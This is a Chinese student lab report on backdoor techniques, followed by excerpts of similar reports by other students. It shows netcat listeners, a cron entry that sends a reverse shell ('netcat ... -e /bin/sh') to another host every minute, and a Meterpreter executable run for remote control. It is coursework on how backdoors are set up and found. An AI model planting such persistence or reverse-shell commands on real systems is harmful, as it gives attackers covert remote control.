20145302張薇《網路對抗技術》後門原理與實踐

2022-07-17 18:12:08 字數 1812 閱讀 2740

1.使用netcat獲取主機操作shell

(1)windows獲取linux的shell

windows在cmd下使用ipconfig命令檢視win的ip位址為10.43.33.60

linux在終端下使用ifconfig命令檢視linux的ip位址為10.43.33.116

windows使用c:\你的nc的目錄路徑》ncat.exe -l -p 5302命令於5302埠進行監聽。在此,我直接進入到nc的目錄下執行的程式。

在使用nc的命令時,防火牆會詢問主機是否可以訪問,直接允許即可。

windows主機傳送nihao

linux無法找到執行該命令

(2)linux獲取windows的shell

(3)cron啟動

與vi的用法一樣,使用i鍵修改檔案為* * * * * /bin/netcat 172.20.10.2 5302 -e /bin/sh,意在使linux每分鐘自動執行指令,**至pc端的5302埠.退出插入模式後儲存退出即可。

隨後,我們可以使用crontab -l檢視cron修改後的內容:

我們在windows主機下的5302埠進行監聽,每分鐘我們就可以獲取乙個shell

2.使用socat獲取主機操作shell, 任務計畫啟動

(1)以linux利用socat獲取windows的shell為例

(2)任務計畫啟動

對此,我上網尋求解決的方法,只能找到如下內容:

根本看不懂啊兄弟……很難受

3.使用msf meterpreter生成可執行檔案,利用ncat傳送檔案到主機並執行獲取主機shell

開啟msf監聽程序

在msf開啟監聽之後,在win下執行我們剛剛的後門程式fool3.exe,linux就可以獲得win的shell,進行遠端控制了。

4.meterpreter資訊提取與提權

例舉你能想到的乙個後門進入到你系統中的可能方式?

例舉你知道的後門如何啟動起來(win及linux)的方式?

meterpreter有哪些給你映像深刻的功能?

如何發現自己有系統有沒有被安裝後門?

20145328 《網路對抗技術》後門原理與實踐

1.使用netcat獲取主機操作shell,cron啟動 2.使用socat獲取主機操作shell,任務計畫啟動 3.使用msf meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell 4.使用msf meterpreter生成獲取目標主機音訊 攝像頭 擊鍵...

20145315何佳蕾《網路對抗》 後門原理與實踐

我下過很多盜版軟體的破解版,而且給了他們執行許可權,感覺真的到處都很危險。win獲得linuxshell 在防火牆裡設定允許ncat執行,開啟監聽,然後獲取shell windows ip位址如下 linux ip位址如下 linux獲得winshell 使用cron設定自動執行 linux獲取wi...

20145204《網路對抗》MAL後門原理與實踐

1 使用netcat獲取主機操作shell,cron啟動 1分 2 使用socat獲取主機操作shell,任務計畫啟動 1分 3 使用msf meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell 1分 4 使用msf meterpreter生成獲取目標主機...